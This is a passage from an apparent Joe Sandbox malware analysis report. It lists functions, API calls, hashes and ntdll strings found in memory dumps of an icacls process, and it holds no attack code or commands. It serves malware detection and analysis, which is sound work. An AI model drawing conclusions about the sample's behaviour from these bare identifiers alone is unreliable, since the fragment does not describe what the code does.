                                                                                                        • Instruction Fuzzy Hash: 6FF039773913143AE220A2A99C02FDBB79C9B84B71F240029FA0DEB180D991B40142A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030C907B Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030C90C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 15c297d4de60ae07b12f9a2af98ce9361618a76828c7e85cd334acc7204ec613
                                                                                                        • Instruction ID: cef9f71b80928fc0fd1b39c1b5cea16d4937ed4bdbb08ecc6704bf004b3f0319
                                                                                                        • Opcode Fuzzy Hash: 15c297d4de60ae07b12f9a2af98ce9361618a76828c7e85cd334acc7204ec613
                                                                                                        • Instruction Fuzzy Hash: 3EF092773917143AE231E29A8C42FDBB79C9F85B60F244128FB09AF5C0DAE5B40142F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7620 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(030D0A09,?,030E425D,030D0A09,030E3967,030E425D,?,030D0A09,030E3967,00001000,?,?,030E8ED0), ref: 030E765C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction ID: 3f2f9c45c7726e1c2034fa1aa1096f2aca131944c7af4e8c3ad5f52ab1bd8581
                                                                                                        • Opcode Fuzzy Hash: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction Fuzzy Hash: F6E039752443447BCA14EF59DC40EDB33ACEFC4A20F004409B908A7241CAB1B91087B8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E7670 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,025088C0,00000007,00000000,00000004,00000000,030D306C,000000F4,?,?,?,?,?), ref: 030E76AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction ID: aeaab66dc82669192b85951517d527cb11e22684164e4f391d88ec20bb3dacc1
                                                                                                        • Opcode Fuzzy Hash: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction Fuzzy Hash: 72E039752002447FC614EE58DC40EDB73ACEFC5A10F004408F908A7241DA70B91086B4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030D7060 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 030D708A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 9b823a27be456c0f8919eafac0b187ef978785dd41f8a937c353361d73d04e5c
                                                                                                        • Instruction ID: 746e3009507a00278146b63a9efc683e82c3a2235a0267edd68226d5e7b2bff3
                                                                                                        • Opcode Fuzzy Hash: 9b823a27be456c0f8919eafac0b187ef978785dd41f8a937c353361d73d04e5c
                                                                                                        • Instruction Fuzzy Hash: 8DE08676641304ABEB14EAB8AC45FA737DC8B88A24F1C4A61FA1CDB2C3E775F5014654
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030D6E70 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,030D0CE0,030E6087,030E3967,?), ref: 030D6EA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 94ece145c5275dadfc9d0f669a861266287ce2d79ee50cd9c819071c6e540313
                                                                                                        • Instruction ID: 4a986ae4415fc5f076719875e8cf1964cdd8a98ab91fa08d471fbc924f4cf98b
                                                                                                        • Opcode Fuzzy Hash: 94ece145c5275dadfc9d0f669a861266287ce2d79ee50cd9c819071c6e540313
                                                                                                        • Instruction Fuzzy Hash: C2D05EB66813043BE644E6E5DC02FDB36CC5B44654F0944A8F908DB282E951F10045A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                                                                                        • Instruction ID: 9aa265a707194c17db976279ef81c682fabbe7cf3295cd78f5aa45c5892c51dc
                                                                                                        • Opcode Fuzzy Hash: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                                                                                        • Instruction Fuzzy Hash: 94B02B718019C4C5EA00E320060C7073D0867C0300F19C0A1E2034241E0738C0C0F171
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 030D16E4 Relevance: .0, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 791b99a98350a28eed60e538bb5d7ac089ecdaba5da6bb7fa7f20682b869381a
                                                                                                        • Instruction ID: 86489dd3fda15843e55816c3eae5a9f9adb21c33f374dbe3f13bf9c2935b15aa
                                                                                                        • Opcode Fuzzy Hash: 791b99a98350a28eed60e538bb5d7ac089ecdaba5da6bb7fa7f20682b869381a
                                                                                                        • Instruction Fuzzy Hash: E5C09B17B454C40881161D9634510F5FB30C447065F6572E7D9D8B3705D40291365BB9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030CD4A0 Relevance: .0, Instructions: 12COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3fc0247848edc14c750ad2a149602311e7b42599c50acc8e2c70f76b6f9f7c62
                                                                                                        • Instruction ID: 38ffa558349cb6dff58545071ac91199007e8df92d9019eeb461c19f5fb629ca
                                                                                                        • Opcode Fuzzy Hash: 3fc0247848edc14c750ad2a149602311e7b42599c50acc8e2c70f76b6f9f7c62
                                                                                                        • Instruction Fuzzy Hash: AFB01227F5100401C4200C0DB4402F0E364C387131D4032A3EC0CF35000047C49600DD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03922890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                                                                                        • Instruction ID: 7f97f70fb92c0a32006e529ccf17c6c1982fa7c3d877b4351af333e02a760a32
                                                                                                        • Opcode Fuzzy Hash: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                                                                                        • Instruction Fuzzy Hash: B8513BB5A005267FCB61DF98898097EFBBCBB492407148669E8A5D7745D334DE40C7E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03992410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 0f7b741115844bc54b61297d0f3743549a47add322377741c8d1fdf653fc62b9
                                                                                                        • Instruction ID: ec13b1fec60b98ee22f8c90ffa31436933d7d1b78b23344a4af37dcba1995b3a
                                                                                                        • Opcode Fuzzy Hash: 0f7b741115844bc54b61297d0f3743549a47add322377741c8d1fdf653fc62b9
                                                                                                        • Instruction Fuzzy Hash: 6051F5B5A00649BEEF20DF9DC89097EB7FDAF48240B048CAAE4D6D7641D7B4DA408761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03917630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 03954713
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03954742
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039546FC
                                                                                                        • ExecuteOptions, xrefs: 039546A0
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03954787
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03954725
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03954655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                                                                                        • Instruction ID: 842eb26770229b8b79f7890791acea7b4cb96ff26e1b77017a43bf2cce4fc59d
                                                                                                        • Opcode Fuzzy Hash: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                                                                                        • Instruction Fuzzy Hash: 2D511735A0131E6ADF10EAE9EC99FAD77ACAF44340F0404D9E505BB181EB719AA1CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 039B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction ID: 65b33bf1d950a90f60b5b52f35a2d530ee38d15a89590fad797702fefb8a3bad
                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction Fuzzy Hash: 59021475508341AFD704CF58CA90AAFBBF9EFC8740F048A2DB9894B264DB71E905CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0392B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 78d449958af5a14375954723905aa2b95dabb720f214b88744bb622d88097eaf
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 4A81E030E01A699EDF24DE68C8907FEBFFAAF443A0F1C4559D861A7799C7348840CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 039920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 374a10640a01d73238cda2b8608e9df0dafce0c98b2f224af423161ee8e3ddf6
                                                                                                        • Instruction ID: 73303982f8faaf21526f8c6987bc36b335b98188468d58a191a5876f57968561
                                                                                                        • Opcode Fuzzy Hash: 374a10640a01d73238cda2b8608e9df0dafce0c98b2f224af423161ee8e3ddf6
                                                                                                        • Instruction Fuzzy Hash: 5621517AE0021DABDB20DF69D840AEFBBECAF44694F180526E945E7200E730D9118BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0390F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039502BD
                                                                                                        • RTL: Re-Waiting, xrefs: 0395031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039502E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                                                                                        • Instruction ID: 5dc7a7bd05cd646518945763c696c64da0a6019218730ee651b04f2f2bf0f5d1
                                                                                                        • Opcode Fuzzy Hash: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                                                                                        • Instruction Fuzzy Hash: 11E1BE316087419FD724CF28C884B2AB7E8BF84754F180A5DF8A68B3E1D774DA85CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0391BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 03957B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03957B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 03957BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                                                                                        • Instruction ID: d5324b1e4324debcc84d216ec792a0af2c773969215745e9e63ea47fa02e3e31
                                                                                                        • Opcode Fuzzy Hash: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                                                                                        • Instruction Fuzzy Hash: 0E4111353017069FD720DE69C840B6AB7EAEF88720F040A1DF85AEB780DB30E955CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0391B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0395728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03957294
                                                                                                        • RTL: Resource at %p, xrefs: 039572A3
                                                                                                        • RTL: Re-Waiting, xrefs: 039572C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                                                                                        • Instruction ID: 0efc26e136458058a2496efd6bf1fbd7ec908724779c011ef845aa7855f383af
                                                                                                        • Opcode Fuzzy Hash: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                                                                                        • Instruction Fuzzy Hash: E541FF3570030AABD720CE65CC41B6AB7AAFF84750F144A19FC56EB280DB31E992CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03992300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 4ee65347b3c089f4f5d5a4443134f5a00056aa4ecb80e87f2cd093821fd87441
                                                                                                        • Instruction ID: 9ed2cb0a562be5e233072558584012892df53c59ccb536f111622a1089157173
                                                                                                        • Opcode Fuzzy Hash: 4ee65347b3c089f4f5d5a4443134f5a00056aa4ecb80e87f2cd093821fd87441
                                                                                                        • Instruction Fuzzy Hash: 75315776A0061DAFDF20DF2DDC41BEEB7BCEF54650F444556E889D7240EB309A448BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03927D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 985f398a928344f602fee8f338ce639c6e69c46f255d1b48532fe9f7018ae475
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: A291E470E04A369BDF24DEA9C8816FEBFA9FF44360F18451AE865F72D9D73089408760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 038E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
